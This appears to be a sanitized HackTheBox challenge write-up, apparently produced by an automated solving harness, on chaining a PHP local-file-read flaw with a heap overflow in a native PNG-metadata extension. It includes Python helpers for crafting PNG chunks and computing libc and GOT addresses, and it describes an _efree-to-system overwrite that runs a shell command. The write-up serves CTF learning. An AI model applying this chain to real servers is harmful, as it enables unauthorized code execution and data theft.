Under The Web
Under The Web is a sanitized challenge note from the local HTB archive, organized for quick review by category, difficulty, evidence flow, and reusable operator
Scenario
Under The Web attack path
Objective
Challenge walkthrough focused on Pwn evidence, validation, and reusable operator lessons.
Walkthrough flow
Audited PHP routes and found view.php arbitrary local...
Used LFI to read process files such as...
Audited metadata_reader.so and found strcpy into...
Locally reproduced the boundary: 56-byte metadata...
Built a raw-PNG metadata payload that corrupts Zend...
Source coverage
High source coverage
Status: complete. This article is generated from 4 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.
High confidence: the page is reconstructed from a primary walkthrough plus multiple supporting notes or evidence sources. Treat the chain as source-backed, while still checking the listed source files for sensitive values.
- Pwn/Under-the-Web/writeup.md
- htb-challenge/Pwn/Under-the-Web/notes.md
- htb-challenge/Pwn/Under-the-Web/memory-summary.md
- htb-challenge/Pwn/Under-the-Web/hypothesis-board.md
Technical Walkthrough
Writeup
Challenge
- Name: Under-the-Web
- Category: Pwn
- Difficulty: Medium
- Mode: hybrid
Summary
Under-the-Web is a PHP web challenge backed by a vulnerable native PHP extension. The web layer has an arbitrary local file read in view.php, and the extension metadata_reader.so has a heap overflow while copying PNG text metadata with strcpy.
The final chain uses the LFI to leak /proc/self/maps, computes live libc and extension bases, crafts a PNG that corrupts Zend heap allocation state, overwrites _efree@GOT with system, and makes a metadata string execute a short command that copies the randomized flag to a known upload path.
Artifact Inventory
- files/a12c7385-1413-45ca-99f9-03c9b443445b.zip: original HTB archive.
- files/extracted/pwn_under_the_web/view.php: arbitrary file read via image= and file_get_contents.
- files/extracted/pwn_under_the_web/upload.php: PNG upload route, magic-byte and extension checked.
- files/extracted/pwn_under_the_web/metadata_reader.so: vulnerable native extension.
- files/extracted/pwn_under_the_web/Dockerfile: renames flag.txt to a random hash-like filename during image build.
- analysis/artifact-inventory.json: hashes and file inventory.
Analysis
Source audit is recorded in analysis/source-audit.md.
view.php URL-decodes image, checks only file_exists, and returns base64_encode(file_get_contents($image)). This gives a read primitive for process files such as /proc/self/maps, confirmed in analysis/remote/proc-self-maps.txt.
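The read primitive can be wrapped in two small helpers. This is a minimal sketch, not the code in solve/solve.py: the helper names are hypothetical, and it assumes the base64 payload is the longest base64-looking run in the response body, which the source does not confirm.

```python
import base64
import re
from urllib.parse import quote


def build_view_url(base_url: str, path: str) -> str:
    """Place a URL-encoded file path in the image= parameter of view.php."""
    return f"{base_url.rstrip('/')}/view.php?image={quote(path, safe='')}"


# Assumption: the file content is the longest base64-looking run in the body.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_file_bytes(body: str) -> bytes:
    """Decode the base64 payload found in a view.php response body."""
    runs = _B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 payload found in response")
    return base64.b64decode(max(runs, key=len))
```

Fetching the URL is left to whatever HTTP client the solver already uses; only the encoding and decoding steps are shown here.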
metadata_reader.so reads PNG tEXt chunks and copies Title, Artist, and Copyright values into fixed 56-byte heap chunks with strcpy. Static evidence is in analysis/local/metadata_reader.objdump.txt. Runtime tests showed 56-byte metadata corrupts adjacent output and 57-byte metadata crashes the process, recorded in analysis/local/php-cli-crash-repro.txt and the upload response artifacts.
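Boundary tests like these need tEXt chunks with exact value lengths, which is easiest with a raw chunk builder. The sketch below follows the PNG chunk layout (length, type, data, CRC-32 over type and data). The helper names and the 1x1 grayscale image are illustrative assumptions, and whether upload.php accepts such a minimal image is not confirmed by the source.

```python
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: big-endian length, type, data, CRC-32."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def text_chunk(keyword: bytes, value: bytes) -> bytes:
    """Build a tEXt chunk: keyword, NUL separator, then the text value."""
    return png_chunk(b"tEXt", keyword + b"\x00" + value)


def minimal_png(text_fields) -> bytes:
    """Build a 1x1 8-bit grayscale PNG carrying the given tEXt fields."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    scanline = b"\x00\x00"  # filter type 0 followed by one gray pixel
    out = PNG_MAGIC + png_chunk(b"IHDR", ihdr)
    for keyword, value in text_fields:
        out += text_chunk(keyword, value)
    out += png_chunk(b"IDAT", zlib.compress(scanline))
    return out + png_chunk(b"IEND", b"")
```

For example, `minimal_png([(b"Title", b"A" * 56)])` and the same call with 57 bytes give the two sides of the boundary described above.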
The initial shortcut ideas were closed:
- Overlay lowerdir /app/flag.txt recovery failed: analysis/remote/lowerdir-flag-probe.txt.
- PHP wrapper bypasses for file_exists failed: analysis/remote/wrapper-probe-summary.txt.
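The overlay probe amounts to turning the lowerdir and upperdir options of the overlay mount into candidate paths and trying each one through the file read. A minimal sketch of the candidate generation, assuming the standard /proc/self/mountinfo layout; the function name is hypothetical and the actual probe script is not shown in the source.

```python
def overlay_flag_candidates(mountinfo: str, rel_path: str = "app/flag.txt"):
    """List <layer>/<rel_path> for every overlay lowerdir and upperdir."""
    candidates = []
    for line in mountinfo.splitlines():
        # Fields after the " - " separator: fstype, source, super options.
        _, sep, tail = line.partition(" - ")
        fields = tail.split()
        if not sep or len(fields) < 3 or fields[0] != "overlay":
            continue
        for option in fields[2].split(","):
            key, _, value = option.partition("=")
            if key in ("lowerdir", "upperdir"):
                for layer in value.split(":"):
                    candidates.append(f"{layer.rstrip('/')}/{rel_path}")
    return candidates
```

In this challenge every candidate came back missing or unreadable, which is why the branch was closed.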
Docker local reproduction was eventually enabled. The local exploit first failed because the local rebuilt libc had system at 0x4c490, while the remote leaked libc had system at 0x4c3a0. After leaking the remote libc and checking its symbols in analysis/remote/remote-libc-symbols.txt, the final remote run used the correct offset.
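A quick way to catch this kind of mismatch is to compare symbol offsets from both libc builds before running the exploit. The sketch below assumes the symbol listings are in `nm -D` style (address, type, name); the format of analysis/remote/remote-libc-symbols.txt is not shown in the source, and the function name is hypothetical.

```python
def symbol_offset(nm_output: str, name: str) -> int:
    """Return the offset of a symbol from nm-style 'addr type name' lines."""
    for line in nm_output.splitlines():
        parts = line.split()
        # Strip version suffixes such as system@@GLIBC_2.2.5.
        if len(parts) == 3 and parts[2].split("@")[0] == name:
            return int(parts[0], 16)
    raise KeyError(name)


local_syms = "000000000004c490 W system"
remote_syms = "000000000004c3a0 W system@@GLIBC_2.2.5"

delta = symbol_offset(local_syms, "system") - symbol_offset(remote_syms, "system")
print(hex(delta))  # 0xf0
```

A non-zero delta means the locally tuned offset must not be reused against the remote instance.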
Solve
The reproducible solver is solve/solve.py.
High-level flow:
- Read /proc/self/maps through view.php.
- Parse the live libc base and metadata_reader.so base.
- Compute:
  - system = libc_base + 0x4c3a0 for the leaked remote libc.
  - _efree@GOT = metadata_reader_base + 0x4090.
- Build a PNG with raw tEXt chunks:
  - Artist: heap overflow padding plus _efree@GOT.
  - Title: short shell command copying /app/[0-9a-f]* to /app/uploads/.underweb_flag.png.
  - Copyright: system address.
- Upload the PNG. When the extension later frees metadata strings, _efree resolves to system, executing the copied Title command.
- Read /app/uploads/.underweb_flag.png through view.php.
- Store the matched HTB flag candidate in loot/ and capture it with the harness.
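The parse and compute steps can be sketched as follows. The two offsets are the ones stated in this writeup; the function names, the libc filename patterns, and the sample paths in the usage note are assumptions for illustration, not taken from solve/solve.py.

```python
SYSTEM_OFFSET = 0x4C3A0      # system in the leaked remote libc
EFREE_GOT_OFFSET = 0x4090    # _efree@GOT inside metadata_reader.so


def lowest_mapping(maps_text: str, matches) -> int:
    """Return the lowest start address among mappings whose path matches."""
    bases = []
    for line in maps_text.splitlines():
        fields = line.split(None, 5)  # range, perms, offset, dev, inode, path
        if len(fields) == 6 and matches(fields[5].strip()):
            bases.append(int(fields[0].split("-")[0], 16))
    if not bases:
        raise ValueError("no matching mapping found")
    return min(bases)


def is_libc(path: str) -> bool:
    # Assumption: libc appears as libc.so.6 or libc-<version>.so.
    return path.rsplit("/", 1)[-1].startswith(("libc.so", "libc-"))


def compute_targets(maps_text: str) -> dict:
    """Derive the live system address and the _efree GOT slot address."""
    libc_base = lowest_mapping(maps_text, is_libc)
    ext_base = lowest_mapping(maps_text, lambda p: p.endswith("metadata_reader.so"))
    return {
        "system": libc_base + SYSTEM_OFFSET,
        "efree_got": ext_base + EFREE_GOT_OFFSET,
    }
```

With a libc mapped at 0x7f1234000000 and the extension at 0x7f1235000000, this yields system at 0x7f123404c3a0 and the GOT slot at 0x7f1235004090.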
The successful remote evidence is analysis/remote/final-exploit-remote-correct-libc.txt.
Flag
Raw flag is stored in loot/flag.txt and intentionally not reproduced here.
Lessons
- When LFI leaks /proc/self/maps, prefer live base addresses over assumptions from local rebuilds.
- Local Docker reproduction is still valuable for heap exploit behavior, but exact libc offsets may differ from the spawned remote instance.
- A crash boundary can hide a useful primitive: here, 56-byte text metadata gave controlled heap corruption, while 57+ bytes produced visible crashes.
- For native PHP extension challenges, a GOT overwrite can be cleaner than full ROP when the extension has writable relocation slots and later calls the overwritten function on attacker-controlled data.
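The boundary lesson is easier to see in a toy model. The sketch below simulates strcpy into the first of two adjacent 56-byte regions. It is a simplified illustration of why the terminator matters, not a model of the Zend allocator, and the function name is hypothetical.

```python
CHUNK = 56  # size of each fixed metadata buffer


def strcpy_into(heap: bytearray, offset: int, value: bytes) -> int:
    """Copy value up to its first NUL, plus a terminator; return spill size."""
    data = value.split(b"\x00", 1)[0] + b"\x00"
    heap[offset:offset + len(data)] = data
    return max(0, len(data) - CHUNK)


for length in (55, 56, 57):
    heap = bytearray(b"\xaa" * (2 * CHUNK))  # two adjacent regions
    spilled = strcpy_into(heap, 0, b"A" * length)
    print(length, spilled, heap[CHUNK:CHUNK + 2].hex())
```

A 55-byte value fits with its terminator, a 56-byte value pushes only the NUL into the neighbor, and a 57-byte value places one controlled byte plus the NUL there.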
Source-Backed Dossier
The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.
Notes
Scope
- Challenge: Under-the-Web
- Category: Pwn
- Difficulty: Medium
- Mode: hybrid
- Remote instance: none
- Start time: 2026-06-12T06:47:04Z
- Operator: harness
- State file: challenge-state.json
Harness Status
- Current phase: see challenge-state.json
- Next allowed actions: see next-action.json
- Raw flags and sensitive material stay in loot/ only. Do not paste them here.
Artifact Inventory
| File | Size | SHA256 | Type | Notes |
|---|---|---|---|---|
| files/a12c7385-1413-45ca-99f9-03c9b443445b.zip | 2096589 | <hash redacted> | Zip archive data, at least v1.0 to extract, compression method=store | zip entries: 11 shown in artifact inventory JSON |
| files/extracted/pwn_under_the_web/Dockerfile | 483 | <hash redacted> | ASCII text | |
| files/extracted/pwn_under_the_web/flag.txt | 27 | <hash redacted> | ASCII text | |
| files/extracted/pwn_under_the_web/index.php | 2371 | <hash redacted> | HTML document text, ASCII text | |
| files/extracted/pwn_under_the_web/metadata_reader.so | 45152 | <hash redacted> | ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=<hash redacted>, with debug_info, not stripped | |
| files/extracted/pwn_under_the_web/start.sh | 93 | <hash redacted> | Bourne-Again shell script text executable, ASCII text | |
| files/extracted/pwn_under_the_web/upload.php | 3300 | <hash redacted> | PHP script text, ASCII text | |
| files/extracted/pwn_under_the_web/uploads/starry_night.png | 1112785 | <hash redacted> | PNG image data, 757 x 599, 8-bit/color RGB, non-interlaced | |
| files/extracted/pwn_under_the_web/uploads/the_potato_eaters.png | 960809 | <hash redacted> | PNG image data, 794 x 599, 8-bit/color RGBA, non-interlaced | |
| files/extracted/pwn_under_the_web/view.php | 1672 | <hash redacted> | HTML document text, ASCII text | |
Evidence Ledger
| Time | Action | Output/File | Finding | Confidence | Next |
|---|---|---|---|---|---|
| 2026-06-12T06:47:04Z | harness init | challenge-state.json | Workspace initialized with deterministic state file | High | Inventory artifacts |
| 2026-06-12T06:47:04Z | artifact inventory | analysis/artifact-inventory.json | 10 artifact(s) inventoried | High | Build or update hypotheses |
| 2026-06-12T06:48:16Z | hypothesis recorded | hypothesis-board.md | LFI leaks runtime/process state, then crafted PNG metadata triggers metadata_reader.so heap overflow to reach the randomized flag | Medium | Run a local Docker service, confirm LFI against /proc/self/maps, upload a long-text PNG, and compare local crash/leak behavior with remote only after instrumentation |
| 2026-06-12T06:48:16Z | source audit | analysis/source-audit.md | Source audit recorded | High | Gate before exploit |
| 2026-06-12T06:48:35Z | local memory search | analysis/research/local-memory-search-20260612T064835012551Z-693ea52d.md | Found 8 safe prior-note result(s) | Medium | Record useful result or skip |
| 2026-06-12T06:48:35Z | checkpoint recorded | analysis/checkpoint-triage-20260612T064835014322Z-b1bcc52d.md | Checkpoint for TRIAGE | High | Use checkpoint to drive next decision |
| 2026-06-12T06:48:49Z | instrumentation plan | analysis/instrumentation-plan.md | Validate the chain from arbitrary file read plus crafted PNG metadata into a usable flag-read primitive | High | Stop after two crafted PNG crashes without new control/leak evidence, if LFI cannot read useful process files, or if local reproduction diverges from remote behavior |
| 2026-06-12T06:49:29Z | RAG query | analysis/rag/rag-query-20260612T064849675838Z-6d9c2e0c.txt | RAG helper exited 0; output saved | Medium | Record retrieval tag and validation |
| 2026-06-12T06:50:25Z | RAG record | analysis/rag-records.md | Retrieved memory tagged GENERIC | Medium | Validate or reject with live evidence |
| 2026-06-12T06:50:25Z | local memory record | analysis/local-memory-records.md | Prior local notes reviewed as fallback/advisory context | Medium | Validate against current evidence |
| 2026-06-12T06:51:51Z | evaluator | analysis/evaluator-20260612T065151158557Z-112613ee.md | Proceed | High | Run gated probe.py LFI reads for /proc/self/cmdline and /proc/self/maps |
| 2026-06-12T06:55:38Z | branch closed | hypothesis-board.md | All lowerdir and upperdir /app/flag.txt candidates from /proc/self/mountinfo were missing or unreadable through view.php LFI | High | Rerank hypotheses |
| 2026-06-12T06:57:45Z | checkpoint recorded | analysis/checkpoint-analysis-20260612T065745753453Z-a6064f0b.md | Checkpoint for ANALYSIS | High | Use checkpoint to drive next decision |
| 2026-06-12T06:58:32Z | branch closed | hypothesis-board.md | Title length 57+ causes truncated response or connection reset even when the Title is the only metadata field; no leak or controlled output observed | High | Rerank hypotheses |
| 2026-06-12T06:59:05Z | branch closed | hypothesis-board.md | php://filter, glob://, and compress.zlib paths all returned Image not found because file_exists() blocked the wrapper paths | High | Rerank hypotheses |
| 2026-06-12T07:07:51Z | research record | analysis/research/research-records.md | Research tagged MATCHED | Medium | Validate against current evidence |
| 2026-06-12T07:07:51Z | evaluator | analysis/evaluator-20260612T070751086055Z-6091524c.md | Proceed | High | Execute solve.py remotely and capture the flag candidate |
| 2026-06-12T07:09:10Z | flag capture | loot/flag.txt | HTB-format flag captured; raw value kept in loot only | High | Write solution and run completion gate |
| 2026-06-12T07:10:47Z | completion gate | challenge-state.json | Completion gate passed; state marked COMPLETE | High | Optional sanitized memory summary approval |
RAG / Advisory Memory
RAG output is advisory only. Record evaluated retrievals with:
scripts/challenge_harness.py rag-record <workspace> --query "..." --tag MATCHED|PARTIAL|MISSING|<secret redacted>|GENERIC --validation "..."
Secrets/Flags
Raw flags and sensitive material stay in loot/ only. Use scripts/challenge_harness.py capture-flag to validate and record flag capture without printing the value.
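The idea of validating a flag without printing it can be illustrated independently of the harness. This is a minimal sketch assuming the usual HTB{...} flag format; it is not the implementation of capture-flag, which the source does not show, and the function name is hypothetical.

```python
import hashlib
import re

FLAG_RE = re.compile(r"HTB\{[^{}]+\}")


def summarize_flag(text: str):
    """Return length and SHA-256 of the first flag-shaped match, or None."""
    match = FLAG_RE.search(text)
    if match is None:
        return None
    flag = match.group(0)
    # Only derived values leave this function; the raw flag is never returned.
    return {
        "length": len(flag),
        "sha256": hashlib.sha256(flag.encode()).hexdigest(),
    }
```

Logging the digest instead of the value lets notes and evidence ledgers confirm a capture while the raw flag stays in loot/.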
Memory Summary
Metadata
- Platform: HackTheBox Challenges
- Category: Pwn
- Challenge: Under-the-Web
- Difficulty: Medium
- Source workspace: <local workspace>
Validated Solve Chain
Concepts only. Do not include raw flags, reusable credentials, tokens, cookies, private keys, or live secrets.
- Audited PHP routes and found view.php arbitrary local file read guarded only by file_exists.
- Used LFI to read process files such as /proc/self/maps and leak live libc plus metadata_reader.so bases.
- Audited metadata_reader.so and found strcpy into fixed 56-byte heap chunks for PNG text metadata.
- Locally reproduced the boundary: 56-byte metadata corrupts adjacent heap/output; 57 or more bytes crash the PHP process.
- Built a raw-PNG metadata payload that corrupts Zend heap allocation state so a later metadata allocation writes to _efree@GOT.
- Overwrote _efree@GOT with system, then used a short metadata string command to copy the randomized flag to a known upload path.
- Retrieved the copied flag through view.php and captured it with the harness.
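Because the addresses travel through strcpy, they cannot contain a NUL byte before their last significant byte. The sketch below checks that constraint when encoding a pointer for a text field. How solve/solve.py handles this is not stated in the source, so the helper name and behavior are assumptions.

```python
import struct


def strcpy_pointer(addr: int) -> bytes:
    """Encode a 64-bit little-endian pointer so strcpy copies it intact."""
    body = struct.pack("<Q", addr).rstrip(b"\x00")  # drop high zero bytes
    if b"\x00" in body:
        raise ValueError(f"{addr:#x} has an embedded NUL; strcpy would truncate it")
    return body
```

A typical userland address such as 0x7f123404c3a0 encodes to six bytes. strcpy then appends one terminating NUL, so the eighth byte of the destination keeps whatever value it already held.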
Reusable Lessons
- LFI of /proc/self/maps can remove the need for a separate address leak in native extension exploitation.
- Validate libc offsets from the exact target libc. A local Docker rebuild can differ from the remote instance.
- If a heap overflow seems to only crash, test exact boundary lengths; off-by-one or fixed-chunk overflows can still create allocation-control primitives.
- For PHP extension pwn, writable GOT plus a later _efree call can provide a compact system(command) path.
Dead Ends
- Overlay lowerdir /app/flag.txt recovery from /proc/self/mountinfo was negative.
- PHP wrapper bypasses such as php://filter, glob://, and compress.zlib:// did not pass the file_exists check.
- Simple long-metadata layouts gave crashes but no direct leak or flag without the GOT overwrite chain.
Tool Quirks
- Docker Desktop was initially stopped; starting it enabled exact local PHP container reproduction.
- GDB inside the amd64 container under Apple Silicon Docker emulation could not obtain registers reliably.
- The local rebuilt libc had system at 0x4c490; the remote leaked libc had system at 0x4c3a0.
Evidence Paths
- analysis/source-audit.md
- analysis/remote/proc-self-maps.txt
- analysis/local/php-cli-crash-repro.txt
- analysis/local/final-exploit-local-spaces.txt
- analysis/remote/remote-libc-symbols.txt
- analysis/remote/final-exploit-remote-correct-libc.txt
- solve/solve.py
- loot/flag.txt
Ingestion Decision
- Proposed for LightRAG: yes
- Requires user approval before ingestion: yes
Hypothesis Board
Keep no more than 3 active hypotheses on Easy/Medium and 5 on Hard unless the user explicitly asks for breadth.
| Rank | Path | Evidence | Missing Proof | Cheapest Validation | Confidence | Status |
|---|---|---|---|---|---|---|
| 1 | LFI leaks runtime/process state, then crafted PNG metadata triggers metadata_reader.so heap overflow to reach the randomized flag | view.php reads arbitrary existing paths; Dockerfile randomizes the flag filename in /app; metadata_reader.so uses 56-byte heap buffers and strcpy on PNG Title/Artist/Copyright text chunks | Run a local Docker service, confirm LFI against /proc/self/maps, upload a long-text PNG, and compare local crash/leak behavior with remote only after instrumentation | Medium | Active |
Closed Branches
| Branch | Evidence Tested | Failure Output | Reason Closed | Revisit Condition |
|---|---|---|---|---|
| Overlay lowerdir /app/flag.txt recovery | analysis/remote/lowerdir-flag-probe.txt | All lowerdir and upperdir /app/flag.txt candidates from /proc/self/mountinfo were missing or unreadable through view.php LFI | Only revisit if a new mountinfo/source clue identifies an accessible layer path or exact randomized flag filename | |
| Simple long tEXt metadata layouts as leak primitive | analysis/remote/upload-title57-only-response.html | Title length 57+ causes truncated response or connection reset even when the Title is the only metadata field; no leak or controlled output observed | Revisit only with local Docker/gdb/ZendMM instrumentation or a payload structure that predicts allocator behavior | |
| PHP wrapper bypass for file_exists LFI guard | analysis/remote/wrapper-probe-summary.txt | php://filter, glob://, and compress.zlib paths all returned Image not found because file_exists() blocked the wrapper paths | Only revisit if a PHP wrapper is found that returns true for file_exists() in PHP 8.2 and can list or transform target files | |
Technical analogy
How to remember this solve
Think of the challenge as a small system resting on two trusted assumptions: that a file_exists check is enough to guard view.php, and that PNG text metadata always fits a 56-byte buffer. The solve is finding those assumptions, validating them, and using them carefully enough to reach the final proof.
For Under The Web, keep the mental model simple: prove each assumption wrong with the smallest safe test (reading /proc/self/maps, probing the 56-byte and 57-byte boundary), then automate only the part that directly leads to the flag.